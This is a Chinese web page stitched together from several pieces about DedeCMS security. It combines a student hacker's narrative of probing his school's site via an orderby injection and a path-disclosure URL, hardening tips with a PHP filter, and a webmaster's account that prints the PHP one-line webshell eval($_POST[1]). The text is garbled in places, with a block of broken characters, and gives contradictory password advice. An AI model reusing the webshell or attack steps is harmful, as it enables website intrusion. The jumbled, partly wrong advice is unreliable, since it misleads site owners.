2014最新DedeCms如何防止入侵

如果你要启用字符串混淆来防采集，请在文档模板需要的字段加上 function='RndString(@me)' 属性，如：{dede:field name='body' function='RndString(@me)'/}。

更新缓存，再更新html

开学了，返校了，又在宿舍上网了，但现在的校园网安全吗暑假中，DeDeCMS系统曝出了严重的漏洞，这个系统在很多学校的校园网中存在，黑客利用该漏洞就可以控制校园网，进行挂马、嵌入病毒……不过校园网中不乏电脑高手，下面我们就来看看“红帽”同学对自己学校网站的开学安全检测。

我的网名叫“红帽”，我猜每一个大学校园里，都有像我这样的一号人，我们对电脑充分的了解，面对互联网海洋时，就如同游泳池中的菲尔普斯一样。无论你需要找到什么东西，只要它存在于互联网之中，或者在互联网中生活过一段时间，我都能够帮助你找到源头，或者帮你把你感兴趣的东西弄到手。你猜对了，我就是黑客，活跃在校园里面的黑客。

我自认为算是高手，帮同学从别的黑客手里**回被窃的账号，在网吧让一个讨厌鬼不停的更换电脑，也曾经尝试着入侵NASA的计算机网络。

这段日子正是开学的日子，我准备对我的学校网站进行了一次安全检测。或许你要问，为什么要对自己学校的网站进行安全检测我们学校用了DeDeCMS系统(中文名称是织梦内容管理系统)，这个系统在很多学校中被使用。

博弈主题：攻击DeDeCMS整站系统

技术难度：★★★★

重点知识：如何用新的DeDeCMS漏洞来入侵

DeDeCMS系统被很多学校使用并不能让我产生检测自己学校的网站的念头，真正让我产生这个念头的原因是这个系统最近曝出了严重的漏洞，不知道网管补上该漏洞没有，如果没有补上，大家回校后上校园网就危险了。

DeDeCMS身藏URL编码漏洞

这次DeDeCMS新出的漏洞是一个URL编解码漏洞，导致漏洞出现的原因是DeDeCMS的设计者在joblistphp、guestbook_adminphp等文件中对orderby参数未做过滤。黑客可以利用这些漏洞查询数据库的敏感信息，例如管理员密码、加密key等，一旦这些敏感资料被黑客掌握，要在校园网内挂马就是轻而易举的事情了，真危险。

小知识：编码是将源对象内容按照一种标准转换为一种标准格式内容。解码是和编码对应的，它使用和编码相同的标准将编码内容还原为最初的对象内容。编解码的目的最初是为了加密信息，经过加密的内容不知道编码标准的人很难识别。

实战入侵

既然知道了漏洞的成因，下面就来亲手检测一下。目前有两种方案可以实现DeDeCMS整站系统的入侵，一种是PHP脚本的入侵方案，采用这种方案，需要先在自己的本机调试好PHP解析环境，然后登录入侵的目标网站，在PHP环境中运行漏洞测试代码。不过这种方案实行起来相对复杂，因此我使用第二种进行检测，通过漏洞检测注入程序直接注入。

首先，登录学校的网站。然后打开《DeDeCMS漏洞注入检测程序》，点击“Target

Infomation”标签选项，在“URL”一项后面将寻找到的有DeDeCMS系统漏洞的网址复制粘贴到地址输入框，这里利用DeDeCMS的网站路径地址“/include/htmledit/indexphp”得到网站的物理路径。

在登录系统之后，复制浏览器地址栏中的网站路径，例如[url=http://wwwhackercom/dedecms5/include/htmledit/indexphpmodetype=basic&height[]=chinaren]http://wwwhackercom/dedecms5/include/htmledit/indexphpmodetype=basic&height[]=chinaren[/url]，然后复制粘贴提交测试，粘贴完成后点击“Check”按钮，测试网站是否符合条件

　　1 安装的时候数据库的表前缀一点要改一下，不用dedecms默认的前缀dede的,可以改成,自己的名字或者o或0以假乱真的写法。

　　2 后台登录开启验证码功能，将默认管理员admin删除，改成一个自己专用的，复杂点的账号。

　　3 装好程序后务必删除install目录。

　　4 将dedecms后台管理默认目录名dede改掉。

　　5 用不到的功能一概关闭，比如会员、评论等，如果没有必要通通在后台关闭。

　　6 以下一些是可以删除的目录：

　　member　会员功能

　　special　专题功能

　　company　企业模块

　　plus\guestbook　留言板

　　以下是可以删除的文件：

　　管理目录下的这些文件是后台文件管理器，属于多余功能，而且最影响安全。file_manage_controlphp file_manage_mainphp file_manage_viewphp media_addphp media_editphp media_mainphp

　　再有：不需要SQL命令运行器的将dede/sys_sql_queryphp 文件删除。

　　不需要tag功能请将根目录下的tagphp删除。

　　不需要顶客请将根目录下的diggphp与diggindexphp删除。

　　7 多关注dedecms官方发布的安全补丁，及时打上补丁。

　　8 下载发布功能（管理目录下soft__xxx_xxxphp），不用的话可以删掉，这个也比较容易上传小马的

　　9 最安全的方式：本地发布html，然后上传到空间。不包含任何动态内容，理论上最安全，不过维护相对来说比较麻烦。

　　10 还是得经常检查自己的网站，被挂黑链是小事，被挂木马或删程序就很惨了，运气不好的话，排名也会跟着掉。所以还得记得时常备份数据！

　　11 添加DedeCms官网出的万能安全防护代码(官网的要会员才能看)，打开config_basephp文件，

　　找到以下这段代码：//禁止用户提交某些特殊变量$ckvs = Array(‘_GET’,'_POST’,'_COOKIE’,'_FILES’);foreach($ckvs as $ckv){if(is_array($$ckv)){foreach($$ckv AS $key => $value)if(eregi(“^(cfg_|globals)”,$key)) unset(${$ckv}[$key]);}}改为下面这段代码：//把get、post、cookie里的 $ckvs = Array('_GET','_POST','_COOKIE');foreach($ckvs as $ckv){if(is_array($$ckv)){foreach($$ckv AS $key => $value)if(!empty($value)){${$ckv}[$key] = str_replace(‘<''','&''lt;''',$value);${$ckv}[$key] = str_replace('''>‘,’’’&’’gt;’,${$ckv}[$key]);}if(eregi(“^cfg_|globals”,$key)) unset(${$ckv}[$key]);}}//检测上传的文件中是否有PHP代码，有直接退出处理if (is_array($_FILES)) {foreach($_FILES AS $name => $value){${$name} = $value['tmp_name'];$fp = @fopen(${$name},’r');$fstr = @fread($fp,filesize(${$name}));@fclose($fp);if($fstr!=” && ereg(“<\”,$fstr)){echo “你上传的文件中含有危险内容，程序终止处理！”;exit();}}}

　　注意事项

　　• 网站安全是一点要的，要不然自己辛辛苦苦做的网站，让黑客入侵了修改了一些重要的信息，排名就会下降。

　　• 日志分析隔三差五的去做，这个可不能闲着，在日志分析中可以精确的得到一些重要的信息。

被入侵后的常见问题如下：

1、 模板被修改，添加大量黑链代码。

2、 添加关键字的单个网址，隐藏链接，并添加超级管理员。

3、 添加了关键字的单个网址，明链接。

如何避免网站被入侵？

1、Dedecms程序，用不到的功能，建议删除或者禁用。

这是入侵的重点，比如没有删除install文件夹，或者没有更改默认的后台登陆路径，还有就是会员注册用不着，但是也没有禁用等等。后台程序不是为你的网站量身定做的，是需要我们进一步修改完善的。

回答不容易,希望能帮到您,满意请帮忙采纳一下，谢谢 !

�谌莺苌伲�赡苄慈氲氖焙虿皇呛芊奖悖�还�庑┐�氲淖饔萌肥挡恍〉摹�edecms一直是很火的建站cms，主要得益于两大站长网的鼎力支持；不过，人火是非多，cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms，前段时间又一次受到攻击，攻击的目的很简单，那么便是黑链，知道后稍微修改下代码就恢复了，不是很严重；这段时间网站又被莫名上传文件，类似前一次，虽然对方还没来得及修改网站模板，不过这说明网站安全防患还未到位，对方任何时候都可能再次取得管理员权限，所以要特别注意网站的安全防患措施。因为我比较喜欢寻根究底，所以就去网上找了一下相关的资料，发现这确实是dedecms的漏洞，黑客可以利用多维的变量绕过正则检测，漏洞主要发生在/plus/mytag_jsphp中，原理便是准备一个MySQL数据库来攻击已知网站的数据库，通过向数据库中写入一句话的代码，只要成功写入，那么以后便可以利用这些代码来获得后台管理员权限。结合我的网站被攻击已经别人类似的经历来看，黑客写入的文件主要存在于/plus/文件夹下，目前已知的几个文件包括gaphp、logphp、bphp、b1php等，文件的特征便是短小，内容很少，可能写入的时候不是很方便，不过这些代码的作用确实不小的。下面这是gaphp文件中的部分代码：<title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])>实际的代码比上面截取的要长，不过都是这段代码的重复，至于logphp的代码，同这个类似，只有一句话，简单明了，如果你对网络安全稍有了解，那么会知道<php eval($_POST[1]);>是php一句话木马，使用部分指定的工具可以执行这段代码，预计是破解密码的功能。既然已经知道对方是利用什么样的漏洞，同时知道对方利用什么样的原理来利用漏洞，那么要怎么预防这些危险的事发生呢？经过查询大量的资料，我初步整理出下面这些预防漏洞被利用的步骤，希望对同样适用dedecms的站长朋友们有所帮助。一、升级版本打好补丁设置目录权限这是官方对此的解决办法，不管你使用的是什么版本的dedecms，都要及时在后台升级版本自动更新补丁，这是避免漏洞被利用的最重要的一步；同时官方还提供设置目录的方法，主要是设置data、templets、uploads、a为可读写不可执行权限；include、member、plus、后台管理目录等设置为可执行可读不可写入权限；删除install及special目录，具体如何设置见官方说明。二、修改admin账号及密码黑客可能是利用默认admin账号，随后推测密码来破解的，所以修改默认的admin账号非常重要，至于如何修改，方法很多，比较有效的是用phpadmin登陆网站数据库，找到dede_admin数据库表（dede是数据库表前缀），修改其中userid及pwd两项，其中密码一定要修改成f297a57a5a743894a0e4，这是默认的密码admin；修改后去后台登陆，登陆dede后台后修改密码。三、别的值得注意的地方至于更多的细节，同样要注意，尽量别选择太廉价的空间，太廉价的空间很容易出现服务器本身的安全问题，只要服务器出现问题，整个服务器下面的网站都没救了。还有便是，如果没必要，尽量别开通会员注册什么的，使用起来很麻烦；至于网站后台目录，不要写到robotstxt里面，同时每个月至少换一次，管理员密码什么的同样要更换，避免和别的账号密码相同被推测出来。

如何避免网站被入侵？

1、Dedecms程序，用不到的功能，建议删除或者禁用。

这是入侵的重点，比如没有删除install文件夹，或者没有更改默认的后台登陆路径，还有就是会员注册用不着，但是也没有禁用等等。后台程序不是为你的网站量身定做的，是需要我们进一步修改完善的。

2、网站密码在长度和复杂性方面都要加强。

3、每天必按时查友链。

4、加强电脑的安全，不要在不安全的电脑上使用密码。

避免网站被入侵需要我们及早的发现问题，加强自查。安全工作不是一蹴而就的事，需要我们及时的升级更新，同时也要加强防范的意识，做到防患于未然！